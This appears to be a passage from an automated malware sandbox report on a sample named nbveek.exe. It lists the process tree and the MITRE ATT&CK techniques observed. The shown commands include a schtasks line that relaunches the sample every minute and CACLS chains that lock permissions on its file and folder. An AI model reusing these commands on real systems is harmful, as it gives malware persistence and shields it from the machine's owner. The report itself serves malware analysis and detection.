- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5696
- C:\Windows\System32\netsh.exe
  "C:\Windows\System32\netsh.exe" winsock reset
  2⤵
  PID:5804

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:6080

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3292

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:5560

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:4912

C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
1⤵
PID:5616
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
  2⤵
  - Creates scheduled task(s)
  PID:5512
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit
  2⤵
  PID:3368
- - C:\Windows\SysWOW64\cacls.exe
    CACLS "nbveek.exe" /P "Admin:N"
    3⤵
    PID:3532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5344
- - C:\Windows\SysWOW64\cacls.exe
    CACLS "nbveek.exe" /P "Admin:R" /E
    3⤵
    PID:1840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5668
- - C:\Windows\SysWOW64\cacls.exe
    CACLS "..\16de06bfb4" /P "Admin:N"
    3⤵
    PID:5888
- - C:\Windows\SysWOW64\cacls.exe
    CACLS "..\16de06bfb4" /P "Admin:R" /E
    3⤵
    PID:5872

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Hidden Files and Directories

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Hidden Files and Directories

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery